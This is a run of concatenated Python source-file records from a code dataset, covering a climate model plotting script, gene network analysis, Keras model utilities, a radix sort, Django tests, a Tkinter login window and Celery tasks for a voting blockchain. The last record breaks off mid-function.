up,down=fluxes(tau_levels,Temp_layers,T_sfc)\n sfc_temp[index]=T_sfc\n #\n # -TD- describe what this loop does\n #\n if np.mod(index,50)==0:\n the_frac=np.int(index/tot_loops*100.)\n sys.stdout.write(\"\\rpercent complete: %d%%\" % the_frac)\n sys.stdout.flush()\n air_temps[:,index]=Temp_layers[:]\n up,down=fluxes(tau_levels,Temp_layers,T_sfc)\n up_flux_run[:,index]=up[:]\n down_flux_run[:,index]=down[:]\n height_levels_run[:,index]=height_levels[:]\n dT_dt=heating_rate(up-down,height_levels,rho_layers)\n Temp_layers[:]=time_step(dT_dt,Temp_layers,delta_time_sec)\n #\n # -TD- describe what the following statements do\n #\n net_downsfc=S0 + down[0]\n T_sfc=(net_downsfc/sigma)**0.25\n \n plt.close('all')\n fig1,axis1=plt.subplots(1,1)\n snapshots=[0,2,8,30,40,50,60,70]\n days=times/24.\n for the_snap in snapshots:\n #\n # -TD- describe what the label does\n #\n label=\"%3.1f\" % days[the_snap]\n height_levels=height_levels_run[:,the_snap]\n layer_heights=(height_levels[1:] + height_levels[:-1])/2.\n axis1.plot(air_temps[:,the_snap],layer_heights*1.e-3,label=label)\n axis1.legend()\n axis1.set_title('temperature profiles for {} days'.format(len(snapshots)))\n axis1.set_xlabel('temperature (deg C)')\n fig1.savefig(\"snapshots.png\")\n\n fig2,axis2=plt.subplots(1,1)\n axis2.plot(days,sfc_temp-Tc)\n axis2.set_title('surface temperature (deg C)')\n axis2.set_ylabel('temperature (degC)')\n axis2.set_xlabel('day')\n axis2.set_xlim((0,100))\n fig2.savefig(\"sfc_temp.png\")\n\n fig3,axis3=plt.subplots(1,1)\n axis3.plot(days,sfc_temp - air_temps[0,:])\n axis3.set_title('air-sea temperature difference (deg C)')\n axis3.set_ylabel('surface - first layer temp (degC)')\n axis3.set_xlabel('day')\n axis3.set_xlim((0,100))\n fig3.savefig(\"air_sea.png\")\n\n plt.show()\n\n \n","sub_path":"lib/equil_run.py","file_name":"equil_run.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"61565041","text":"# RUN WITH /usr/bin/python3 minet.py (python 3.6)\n\nimport rpy2\nimport rpy2.robjects as 
ro\nimport rpy2.robjects.numpy2ri as rn\nimport numpy as np\nimport xml.dom.minidom as md\nfrom sklearn.metrics import roc_curve, auc\n\ndatadirname = \"/home/user/Sirius/gene_network_sirius_2019/Data\"\ndatafilename = datadirname + \"/{0}/{0}_data.txt\"\ngraphfilename = datadirname + \"/{0}/{0}_graph.xml\"\ndatalist = ['exps_10_bgr', 'exps_50_bgr', 'exps_100_bgr', 'genes_200_exps_10_bgr', 'genes_400_exps_10_bgr', 'genes_500_exps_10_bgr']\n# datalist = ['genes_700_exps_10_bgr', 'genes_1000_exps_10_bgr']\nalgolist = ['clr', 'aracne', 'mrnet', 'mrnetb']\n\ndef run_minet(filename, algo):\n\n rn.activate()\n\n code = \"\"\"library(minet)\n filename <- '\"\"\" + filename + \"\"\"'\n first <- readLines(filename, n=1)\n names <- strsplit(first, '\\t')\n names <- unlist(names, use.names=FALSE)\n d <- read.table(filename, skip=1, col.names = names)\n\n mim <- build.mim(d, estimator = \"mi.empirical\", disc = \"equalfreq\")\n\n weight_adjacency_matrix <- minet(mim, method='\"\"\" + algo + \"\"\"', estimator=\"mi.empirical\", disc=\"equalfreq\");\n\n weight_adjacency_matrix;\n \"\"\"\n\n f = ro.r(code)\n\n weight_adjacency_matrix = np.array(f)\n return weight_adjacency_matrix\n\n # long_array = weight_adjacency_matrix[np.triu_indices(weight_adjacency_matrix.shape[0])]\n # return long_array\n\n\n\ndef xml_graph_to_adjacency_matrix(filename):\n dom = md.parse(filename)\n\n # print(dom.toprettyxml())\n\n nodes = dom.getElementsByTagName(\"Node\")\n ids = [int(a.getAttribute('id')) for a in nodes]\n # parserint(ids)\n adjacency_matrix = np.zeros(shape=(len(ids), len(ids)))\n edges = dom.getElementsByTagName(\"Edge\")\n for e in edges:\n source = int(e.getElementsByTagName('from')[0].firstChild.nodeValue)\n target = int(e.getElementsByTagName('to')[0].firstChild.nodeValue)\n adjacency_matrix[source][target] = 1\n adjacency_matrix[target][source] = 1\n return adjacency_matrix\n\n\ndef adjacency_matrix_to_array_of_degrees(adjacency_matrix):\n degrees = [[] for i in range(len(adjacency_matrix))]\n for i in range(len(adjacency_matrix)):\n deg_i = 0\n for j in range(len(adjacency_matrix[i])):\n if adjacency_matrix[i][j] == 1:\n deg_i += 1\n degrees[deg_i].append(i)\n return degrees\n\n\nresults = np.zeros(shape=(len(datalist), len(algolist)))\n\nfor ii, dataname in enumerate(datalist):\n\n for jj, algo in enumerate(algolist):\n\n matrix = run_minet(datafilename.format(dataname), algo)\n true_matrix = xml_graph_to_adjacency_matrix(graphfilename.format(dataname))\n\n # print(matrix, true_matrix)\n\n degrees = adjacency_matrix_to_array_of_degrees(true_matrix)\n\n # print(degrees)\n\n aucs_mean = np.zeros(shape=(len(degrees)))\n aucs_var = np.zeros(shape=(len(degrees)))\n for i, deg in enumerate(degrees):\n if len(deg) != 0:\n aucs_d = np.zeros(shape=(len(deg)))\n for j, ind in enumerate(deg):\n true_array = true_matrix[ind]\n array = matrix[ind]\n # print(array, true_array)\n roc_auc = 0\n try:\n fpr, tpr, thresholds = roc_curve(true_array, array)\n roc_auc = auc(fpr, tpr)\n except:\n print(\"error\", dataname, algo)\n aucs_d[j] = roc_auc\n aucs_mean[i] = aucs_d.mean()\n aucs_var[i] = aucs_d.var()\n with open(\"result_analysis.txt\", \"a\") as f:\n print(dataname, algo)\n f.write(dataname + \" \" + algo + \":\" + '\\n')\n for i in range(len(aucs_mean)):\n if aucs_mean[i] != 0:\n f.write(str(i) + \" \" + str(aucs_mean[i]) + \" \" + str(aucs_var[i]) + 
'\\n')\n","sub_path":"MutualInformation/minet_analysis.py","file_name":"minet_analysis.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"335345588","text":"import numpy as np\n\nfrom keras.models import model_from_json\nfrom sklearn.metrics import classification_report,confusion_matrix\n\nfrom dataset import Dataset\nfrom constants import *\n\n\ndef evaluate_model(model, X_test, Y_test):\n print(\"Evaluating...\")\n loss, accuracy = model.evaluate(X_test, Y_test)\n print('\\nloss: {} - accuracy: {}'.format(loss, accuracy))\n\n\ndef save_model(model, model_name):\n # serialize model to JSON\n model_json = model.to_json()\n with open(model_name + \".json\", \"w\") as json_file:\n json_file.write(model_json)\n # serialize weights to HDF5\n model.save_weights(model_name + \".h5\")\n print(\"Saved model to disk\")\n\n\ndef load_model(model_name):\n # load json and create model\n json_file = open(model_name + '.json', 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n loaded_model.load_weights(model_name + \".h5\")\n loaded_model.compile(\n loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy']\n )\n print(\"Loaded model from disk\")\n return loaded_model\n\ndef g_confusion_matrix(model, X_test, Y_test):\n y_pred = model.predict_classes(X_test)\n print(y_pred)\n\n p = model.predict_proba(X_test) # to predict probability\n\n target_names = [str(i) for i in range(273)]\n print('\\n' + classification_report(np.argmax(Y_test, axis=1), y_pred, target_names=target_names))\n print(confusion_matrix(np.argmax(Y_test, axis=1), y_pred))\n\n\nif __name__ == \"__main__\":\n # change 3 string parameters to test different sets and models\n d = Dataset(\"pkl_dataset/wooden_blur_10k/\", \"train_val_set_10000\")\n X_test, Y_test = d.get_train_dataset()\n\n m = load_model('trained_models/wooden_blur_10k_model')\n g_confusion_matrix(m, X_test, Y_test)","sub_path":"deeplane/model_handler.py","file_name":"model_handler.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"131148538","text":"import argparse\nimport sys\n\n#parser = argparse.ArgumentParser()\n#parser.add_argument('--vectors_file', default='twitter.txt', type=str)\n#args = parser.parse_args()\nvectors_file = sys.argv[1]\n\nwith open(vectors_file, 'r') as f:\n\twords = [(x.rstrip().split(' ')[0], x) for x in f.readlines()]\n\tvocab_file = open(\"vocab.txt\", \"w\")\n\tvector_out = open(\"vectors.txt\", \"w\")\n\tfor word in words:\n\t\tvocab_file.write(word[0] + \"\\n\")\n\t\tvector_out.write(word[1])\n","sub_path":"src/main/resources/worddist/splitter.py","file_name":"splitter.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"584413042","text":"from resnet import resnet18\nfrom torchsummary import summary\nfrom pprint import pprint\n\n\n# Part (c)\nresnet = resnet18().to('cpu')\nsummary(resnet, (3, 224, 224))\n\n\n# Part(c): Alternate method\ndef add_wt(num_wts, key, value):\n if key not in num_wts:\n num_wts[key] = 0\n num_wts[key] += value\n\n\nlayer_map = {}\nwts_maps = {}\nfor name, obj in resnet.named_parameters():\n if name == \"conv1.weight\" or name == \"bn1.weight\" or name == \"bn1.bias\":\n add_wt(wts_maps, \"conv1\", obj.numel())\n elif 
name == \"fc.weight\" or name == \"fc.bias\":\n add_wt(wts_maps, \"fc\", obj.numel())\n else:\n name_s = name.split(\".\")\n layer_name = name_s[0] + \"-\" + name_s[1]\n add_wt(layer_map, name_s[0], obj.numel())\n if (\"conv1.weight\" in name) or (\"bn1.weight\" in name) or \\\n (\"bn1.bias\" in name):\n add_wt(wts_maps, layer_name + \"-conv1\", obj.numel())\n elif (\"conv2.weight\" in name) or (\"bn2.weight\" in name) or \\\n (\"bn2.bias\" in name):\n add_wt(wts_maps, layer_name + \"-conv2\", obj.numel())\n elif (\"downsample\" in name):\n add_wt(wts_maps, layer_name + \"-downsample\", obj.numel())\n\npprint(wts_maps)\nprint(\"---------\")\npprint(layer_map)\n\n# Part(e): Batch-norm split\nbatchNormGroup, biasGroup, restGroup = [], [], []\nfor name, param in resnet.named_parameters():\n numparam = 1\n print(name)\n for x in param.shape:\n numparam = numparam * x\n if \"bn\" in name or \"downsample.1\" in name:\n batchNormGroup.append((name, numparam))\n elif \"bias\" in name:\n biasGroup.append((name, numparam))\n else:\n restGroup.append((name, numparam))\n\n# Batch norm weights/bias\ntot_params = [0, 0, 0]\nfor name, numparam in batchNormGroup:\n tot_params[0] = tot_params[0] + numparam\n\n# From Finaly FC and downsample layers\nfor name, numparam in biasGroup:\n tot_params[1] = tot_params[1] + numparam\n\n# All conv wts/FC wts\nfor name, numparam in restGroup:\n tot_params[2] = tot_params[2] + numparam\n\nprint(\"--------------\")\nprint(\"BatchNorm params: \" + str((tot_params[0])))\nprint(\"Biases params: \" + str((tot_params[1])))\nprint(\"Rest params: \" + str((tot_params[2])))\nprint(\"Total params: \" + str(sum(tot_params)))\n","sub_path":"PS2/hw2 solutions/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"322843001","text":"#!/usr/bin/python\nimport tornado.ioloop\nimport tornado.web\nimport os\nimport json\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n \tself.render(\"d&dhome.html\")\n# self.write(\"The site has loaded.\")\n# self.render(\"static/html/d&dhome.html\")\n\ndef make_app():\n settings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\")\n }\n\n return tornado.web.Application([ \n (r\"/\", MainHandler),\n ], autoreload=True,\n **settings)\n\nif __name__ == \"__main__\":\n app = make_app()\n app.listen(8080)\n tornado.ioloop.IOLoop.current().start()\n\n#class MainHandler(tornado.web.RequestHandler):\n# def get(self):\n","sub_path":"website/ui/IanSite.py","file_name":"IanSite.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"486881701","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.2'\n\nsetup(name='ulif.pynotify',\n version=version,\n description=\"Helpers to bridge different Python envs and OpenOffice.org.\",\n long_description=open(\"README.txt\").read() + \"\\n\\n\" +\n open(\"CHANGES.txt\").read(),\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Framework :: Buildout\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n ],\n keywords='filesystem changes monitor watchdog inotify',\n author='Uli Fouquet',\n author_email='uli at gnufix.de',\n url='http://pypi.python.org/pypi/ulif.pynotify',\n license='GPL',\n 
packages=find_packages('src', exclude=['ez_setup']),\n      package_dir = {'': 'src'},\n      namespace_packages=['ulif', ],\n      include_package_data=True,\n      zip_safe=False,\n      install_requires=[\n          'setuptools',\n          'zc.buildout',\n          ],\n      setup_requires=[\"Sphinx-PyPI-upload\"],\n      extras_require=dict(\n          test = [\n              'zope.testing',\n              'zc.recipe.egg',\n              ],\n          docs = [\n              'Sphinx',\n              'collective.recipe.sphinxbuilder',\n              'docutils',\n              'roman',\n              ],\n          sqlite = [\n              'pysqlite',\n              ],\n          ),\n      entry_points=\"\"\"\n      [console_scripts]\n      pynotify-ctl = ulif.pynotify.ui.pynotifyctl:main\n      pynotify = ulif.pynotify.ui.pynotify:main\n      \"\"\",\n      )\n","sub_path":"pypi_install_script/ulif.pynotify-0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"594935121","text":"#Random generator\nimport random\nrandom.seed()\n\n#values and calculation\n\na = random.randint(1,10)\nb = random.randint(1,10)\nc = a + b\n\nprint(\"The output:\", a, \"+\", b )\n\n#Input\n\nprint(\"Please enter a number:\")\nz = input()\nzahl = int(z)\n\n#Multi-way branching, logical operators\n#Condition with several comparison operators\n\nif zahl == c:\n    print(zahl, \"is correct\")\nelif zahl < 0 or zahl > 100:\n    print(zahl, \"is completely wrong\")\nelif c-1 <= zahl <= c+1:\n    print(zahl, \"is very close\")\nelse:\n    print(zahl, \"is wrong\")\n\n#End\n\nprint(\"Result:\", c)\n","sub_path":"spiel_operatorpy.py","file_name":"spiel_operatorpy.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"81906198","text":"from quickstats import models, tasks\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase, override_settings\n\n\nclass WaypointTest(TestCase):\n    def setUp(self):\n        self.user = User.objects.create(username=\"WaypointTest\")\n        self.date = \"2019-11-06T11:42:53.800762+00:00\"\n\n    @override_settings(CELERY_TASK_ALWAYS_EAGER=True)\n    def test_api(self):\n        widget = models.Widget.objects.create(owner=self.user)\n\n        response = self.client.get(\n            reverse(\"api-widget:waypoint-list\", kwargs={\"widget_pk\": widget.pk})\n        )\n        self.assertEqual(response.status_code, 401, \"anonymous user can not view\")\n\n        self.client.force_login(self.user)\n        response = self.client.post(\n            reverse(\"api-widget:waypoint-list\", kwargs={\"widget_pk\": widget.pk}),\n            data={\"timestamp\": self.date, \"lat\": 1, \"lon\": 1, \"state\": \"waypoint\"},\n            content_type=\"application/json\",\n        )\n        self.assertEqual(response.status_code, 201, \"can post sample\")\n\n        response = self.client.get(\n            reverse(\"api-widget:waypoint-list\", kwargs={\"widget_pk\": widget.pk})\n        )\n        data = response.json()\n        self.assertEqual(data[\"count\"], 1, \"Found one waypoint\")\n\n    @override_settings(CELERY_TASK_ALWAYS_EAGER=True)\n    def test_owntracks_waypoints(self):\n        tasks.owntracks_mqtt_waypoints(\n            \"owntracks/WaypointTest/device/waypoints\",\n            {\n                \"_type\": \"waypoints\",\n                \"waypoints\": [\n                    {\n                        \"_type\": \"waypoint\",\n                        \"tst\": 1560375712,\n                        \"lat\": 100.1,\n                        \"lon\": 100.1,\n                        \"rad\": 100,\n                        \"desc\": \"test-location\",\n                    }\n                ],\n            },\n        )\n        self.assertEqual(models.Widget.objects.count(), 1)\n\n    @override_settings(CELERY_TASK_ALWAYS_EAGER=True)\n    def test_owntracks_location(self):\n        tasks.owntracks_mqtt_location(\n            \"owntracks/WaypointTest/device\",\n            {\n                \"batt\": 100,\n                \"lon\": 100.3543190608404,\n                
\"acc\": 65,\n \"p\": 102.1,\n \"bs\": 3,\n \"vac\": 10,\n \"lat\": 100.1,\n \"inregions\": [\"test-location\"],\n \"t\": \"u\",\n \"conn\": \"w\",\n \"tst\": 1571049037,\n \"alt\": 12,\n \"_type\": \"location\",\n \"tid\": \"PR\",\n },\n )\n self.assertEqual(models.Widget.objects.count(), 1)\n self.assertEqual(models.Waypoint.objects.count(), 1)\n self.assertEqual(models.Setting.objects.count(), 1)\n","sub_path":"quickstats/tests/test_waypoints.py","file_name":"test_waypoints.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"339557923","text":"from tkinter import ttk\nfrom StandardValues import *\n\n\nclass Login:\n def __init__(self, debug):\n self.debug = debug\n\n self.username = \"\"\n self.password = \"\"\n\n self.root = Tk()\n self.root.withdraw()\n\n self.login_scrn = None\n\n self.username_label = None\n self.username_tb = None\n\n self.pw_label = None\n self.pw_tb = None\n\n self.submit_btn = None\n self.exit_btn = None\n\n self.create_window()\n\n def login(self):\n self.username = self.username_tb.get()\n self.password = self.pw_tb.get()\n\n def create_window(self):\n # set login screen\n self.login_scrn = Toplevel()\n self.login_scrn.configure(background=StandardValues.background)\n self.login_scrn.winfo_toplevel().title(\"User Login\")\n\n StandardValues.get_screen_position(self.root)\n\n # Positions the window in the center of the page.\n self.login_scrn.geometry(\"+{}+{}\".format(StandardValues.scr_width, StandardValues.scr_height))\n self.create_buttons()\n\n def create_buttons(self):\n # set username and pw text boxes and labels\n self.username_label = Label(self.login_scrn, bg=\"white\", text=\"User Name\")\n self.username_label.grid(row=0, column=0)\n\n self.username_tb = Entry(self.login_scrn)\n self.username_tb.insert(END, \"\")\n self.username_tb.bind('', self.submit)\n self.username_tb.grid(row=0, column=1, padx=20)\n\n self.pw_label = Label(self.login_scrn, bg=\"white\", text=\"Password\")\n self.pw_label.grid(row=1, column=0)\n\n self.pw_tb = Entry(self.login_scrn)\n self.pw_tb.insert(END, \"\")\n self.pw_tb.bind('', self.submit)\n self.pw_tb.grid(row=1, column=1, padx=20)\n\n self.create_submit(self.username_tb, self.pw_tb)\n # self.create_exit()\n\n\n def create_submit(self, username_textbox, pw_textbox):\n var = IntVar()\n self.submit_btn = Button(self.login_scrn,\n text=\"Submit\")\n self.submit_btn.config(command=lambda: {var.set(1),\n self.login(),\n self.login_scrn.destroy()})\n\n self.submit_btn.grid(row=0, column=2, padx=15)\n self.submit_btn.bind('', self.submit)\n\n if self.debug:\n username_textbox.insert(END, \"TESTUSER\")\n pw_textbox.insert(END, \"TESTUSER\")\n self.click_submit()\n else:\n self.submit_btn.wait_variable(var)\n\n # def create_exit(self):\n # var = IntVar()\n # self.exit_btn = ttk.Button(self.login_scrn,\n # text=\"Exit\",\n # command=lambda: {var.set(1), self.login_scrn.destroy()})\n # self.exit_btn.grid(row=1, column=2, padx=15)\n # self.exit_btn.bind('', self.exit)\n # self.exit_btn.wait_variable(var)\n\n def exit(self, event):\n self.exit_btn.invoke()\n\n def submit(self, event):\n self.submit_btn.invoke()\n\n def click_submit(self):\n self.submit_btn.invoke()\n","sub_path":"src/app/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"255256967","text":"class Node:\n def __init__(self, data):\n self.data = 
data\n self.previous = None\n self.next = None\n\n def __str__(self):\n return str(self.data)\n\n\nclass LinkedList:\n def __init__(self):\n self.head = self.tail = None\n self.sizes = 0\n\n def __str__(self):\n if not self.isEmpty():\n cur = self.head\n s = \"\"\n while cur.next != None:\n s += str(cur.data) + ' -> '\n cur = cur.next\n s += str(cur.data)\n return s\n else:\n return ''\n\n def str_without(self):\n if not self.isEmpty():\n cur = self.head\n s = \"\"\n while cur.next != None:\n s += str(cur.data) + ' '\n cur = cur.next\n s += str(cur.data)\n return s\n else:\n return ''\n\n def reverse(self):\n if self.isEmpty():\n return \"Empty\"\n cur, s = self.tail, \" \"\n while cur.previous != None:\n s += str(cur.data) + \" \"\n cur = cur.previous\n s += str(cur.data)\n return s\n\n def isEmpty(self):\n return self.sizes == 0\n\n def size(self):\n return self.sizes\n\n def append(self, data):\n if self.head == None:\n self.head = self.tail = Node(data)\n else:\n t = Node(data)\n t.previous = self.tail\n t.next = self.tail.next\n self.tail.next = t\n self.tail = t\n self.sizes += 1\n\n def addHead(self, data):\n if self.head == None:\n self.head = self.tail = Node(data)\n else:\n t = Node(data)\n t.next = self.head\n t.previous = self.head.previous\n self.head.previous = t\n self.head = t\n self.sizes += 1\n\n def insert(self, index, data):\n if index == 0 or index < -1*self.sizes:\n self.addHead(data)\n elif index > self.sizes - 1:\n self.append(data)\n else:\n if index < 0:\n index = self.sizes + index\n q = Node(data)\n p = self.head\n for i in range(index - 1):\n p = p.next\n q.next = p.next\n q.previous = p\n p.next.previous = q\n p.next = q\n self.sizes += 1\n\n def search(self, data):\n cur = self.head\n while cur != None:\n if cur.data == data:\n return True\n cur = cur.next\n return False\n\n def index(self, data):\n p = self.head\n i = 0\n while p != None:\n if p.data == data:\n return i\n i += 1\n p = p.next\n return -1\n\n def pop(self, index=None):\n if index == 0 or index == -1*self.sizes:\n self.head.next.previous = self.head.previous\n self.head = self.head.next\n elif index == None or index == -1 or index == self.sizes - 1:\n self.tail.previous.next = self.tail.next\n self.tail = self.tail.previous\n\n else:\n cur = self.head\n for i in range(index - 1):\n cur = cur.next\n if cur.next.next != None:\n cur.next.next.previous = cur\n cur.next = cur.next.next\n self.sizes -= 1\n\n\ndef RadixSort(L=LinkedList()):\n before_sort, after_sort = L, LinkedList()\n roundtake = 1\n cur = before_sort.head\n q = -1\n while True:\n print('------------------------------------------------------------')\n print(f'Round : {roundtake}')\n for j in range(10):\n print(f'{j} : ', end='')\n m = LinkedList()\n t = before_sort.head\n while t != None:\n w = len(t.data)\n if '-' in t.data:\n w -= 1\n if (q < -w and j == 0):\n if m.size() == 0:\n m.append(t.data)\n else:\n if int(m.tail.data) >= int(t.data) >= int(m.head.data):\n a = m.head\n ind = 0\n while a != None:\n if int(a.data) >= int(t.data):\n m.insert(ind, t.data)\n break\n ind += 1\n a = a.next\n elif int(m.head.data) > int(t.data):\n m.addHead(t.data)\n elif int(m.tail.data) < int(t.data):\n m.append(t.data)\n if q >= -w:\n if t.data[q] == str(j):\n if m.size() == 0:\n m.append(t.data)\n else:\n if int(m.tail.data) >= int(t.data) >= int(m.head.data):\n a = m.head\n ind = 0\n while a != None:\n if int(a.data) >= int(t.data):\n m.insert(ind, t.data)\n break\n ind += 1\n a = a.next\n elif int(m.head.data) > int(t.data):\n 
m.addHead(t.data)\n                        elif int(m.tail.data) < int(t.data):\n                            m.append(t.data)\n            t = t.next\n        print(m.str_without())\n        if m.size() == before_sort.size() and j == 0:\n            after_sort = m\n    if before_sort.size() == after_sort.size():\n        break\n    roundtake += 1\n    q -= 1\nprint('------------------------------------------------------------')\nprint(f'{roundtake - 1} Time(s)')\nprint(f'Before Radix Sort : {before_sort}')\nprint(f'After Radix Sort : {after_sort}')\nL = after_sort\n\n\ninp = input(\"Enter Input : \").split()\nL = LinkedList()\nfor i in inp:\n    L.append(i)\nRadixSort(L)\n","sub_path":"DataStructure-Python/Link List/Radix Sort.py","file_name":"Radix Sort.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"92897509","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('register', '0007_horario_turma'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='turma',\n            name='ano_letivo',\n            field=models.CharField(max_length=4, verbose_name=b'Ano Letivo'),\n        ),\n    ]\n","sub_path":"onda_esportiva/register/migrations/0008_auto_20170408_1917.py","file_name":"0008_auto_20170408_1917.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"295408536","text":"from __future__ import absolute_import\nfrom nodeProject.nodeApp import services\nfrom nodeProject.nodeApp.models import Seeder, Block, Vote\nfrom nodeProject.nodeApp.serializers import VoteSerializer\nfrom nodeProject.nodeApp.services import getLongestBlockchain\nfrom nodeProject.nodeApp.utilities import concatenate, encryptSha256, dateToString, stringToDate\nfrom nodeProject.blockchainReusableApp.utilities import verifySignature\nfrom django.utils import timezone\nfrom celery import shared_task\nfrom celery import task\nimport requests\nimport logging\nimport json\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# Broadcast of the votes\n@shared_task\ndef broadcastVote(vote, myIp, myPort):\n\n    # Broadcast the vote to the known nodes\n    for node in Seeder.objects.all():\n\n        # Link to the REST APIs of the known nodes\n        url = 'http://'+ node.ip + ':' + str(node.port) + '/blockchain/vote/'\n\n        # Ensuring that a node does not send a vote to itself\n        #\n        # For that, either the first part of the ip is different,\n        # Or the port is different\n        if(node.ip.split('.')[0] != myIp.split('.')[0] or str(node.port) != myPort):\n            try:\n                # Send a request that delivers the vote to the defined url\n                jsonResponse = requests.post(url, data=vote, timeout=5)\n                logger.info(\"For this url: \" + url + \" it worked\")\n            # In case some connection error happens\n            except:\n                logger.info(\"For this url: \" + url + \" it did not work\")\n        else:\n            logger.info(\"A self-connection attempt was made for the url: \" + url)\n\n# Mining of the block\n@shared_task\ndef proofOfWork(blockId):\n\n    # Fetch the object\n    block = Block.objects.get(index=blockId)\n\n    # Building a string of zeros the size of the blockchain difficulty\n    difficulty = block.difficulty\n    target = \"0\" * difficulty\n\n    # Copy of the current block's hash and nonce\n    # so the calculations are done in memory,\n    # preventing the performance loss there would be\n    # from updating the data directly in the database\n    currentHash = block.currentBlockHash\n    
currentNonce = 0\n\n    # While the first 'n = difficulty' characters\n    # of the current hash are not equal to zero,\n    # increment the nonce and recompute the hash\n    while(currentHash[:difficulty] != target):\n        # Update the data in memory\n        currentNonce = currentNonce + 1\n        currentTimestamp = timezone.now()\n        currentHash = encryptSha256(\n            concatenate(\n                [\n                    block.index,\n                    dateToString(currentTimestamp),\n                    block.votes,\n                    block.difficulty,\n                    currentNonce,\n                    block.previousBlockHash\n                ]\n            )\n        )\n    block.nonce = currentNonce\n    block.timestamp = currentTimestamp\n    block.currentBlockHash = currentHash\n    block.save()\n\n@shared_task(name=\"mine_new_block\")\ndef mineNewBlock():\n\n    # Check which known node has the most blocks\n    biggestNodeId, biggestNodeLength = getLongestBlockchain()\n\n    # Length of the node's own blockchain\n    myLength = Block.objects.count()\n\n    # If no known node has more blocks than the node itself\n    if(biggestNodeId==0):\n        logger.info(\"The current node already has the longest blockchain among all known nodes!\")\n\n    # Otherwise\n    else:\n\n        # Known node with the longest blockchain\n        biggestNode = Seeder.objects.get(id=biggestNodeId)\n\n        # If the difference is only one block, download just the node's last valid block\n        if((biggestNodeLength - myLength) == 1 and services.getBlockchainSyncStatus()=='Válida'):\n\n            # Store the block data\n            block = requests.get(\"http://\" + biggestNode.ip + \":\" + str(biggestNode.port) + \"/blockchain/lastValidBlock\").json()\n\n            # Save all the votes\n            for vote in block['votes']:\n                newVote = Vote(\n                    voterPubKey = vote['voterPubKey'],\n                    candidateRole = vote['candidateRole'],\n                    voterDocument = vote['voterDocument'],\n                    candidateNumber = vote['candidateNumber'],\n                    digitalSignature = vote['digitalSignature']\n                )\n                newVote.save()\n\n            logger.info(\"Copied the last valid block from \" + biggestNode.ip + \":\" + str(biggestNode.port))\n\n        # If the difference is more than one block, download the whole chain\n        elif((biggestNodeLength - myLength) > 1 or services.getBlockchainSyncStatus()=='Inválida'):\n\n            # Remove all blocks\n            Block.objects.all().delete()\n            # Remove all votes\n            Vote.objects.all().delete()\n\n            # Sync all the data with the known node\n            blocks = requests.get(\"http://\" + biggestNode.ip + \":\" + str(biggestNode.port) + \"/blockchain/syncBlocks\").json()\n\n            # For each block\n            for block in blocks:\n\n                # Assign the same data to the block and save it\n                newBlock = Block(\n                    index = block['index'],\n                    timestamp = stringToDate(block['timestamp']),\n                    votes = json.dumps(block['votes'], indent=3, ensure_ascii=False),\n                    difficulty = block['difficulty'],\n                    nonce = block['nonce'],\n                    previousBlockHash = block['previousBlockHash'],\n                    currentBlockHash = block['currentBlockHash']\n                )\n                newBlock.save()\n\n                # For each vote\n                for vote in block['votes']:\n\n                    # Assign the same data to the vote and save it\n                    newVote = Vote(\n                        voterPubKey = vote['voterPubKey'],\n                        candidateRole = vote['candidateRole'],\n                        voterDocument = vote['voterDocument'],\n                        candidateNumber = vote['candidateNumber'],\n                        digitalSignature = vote['digitalSignature'],\n                        block_id = newBlock.id\n                    )\n                    newVote.save()\n\n            logger.info(\"Copied the entire blockchain from \" + biggestNode.ip + \":\" + str(biggestNode.port))\n\n\n    # Only add new blocks if the last one has already been validated\n    if(services.getBlockchainSyncStatus() == \"Válida\"):\n\n        # List of extra votes a user has\n        extraVotes = []\n\n        for vote in 
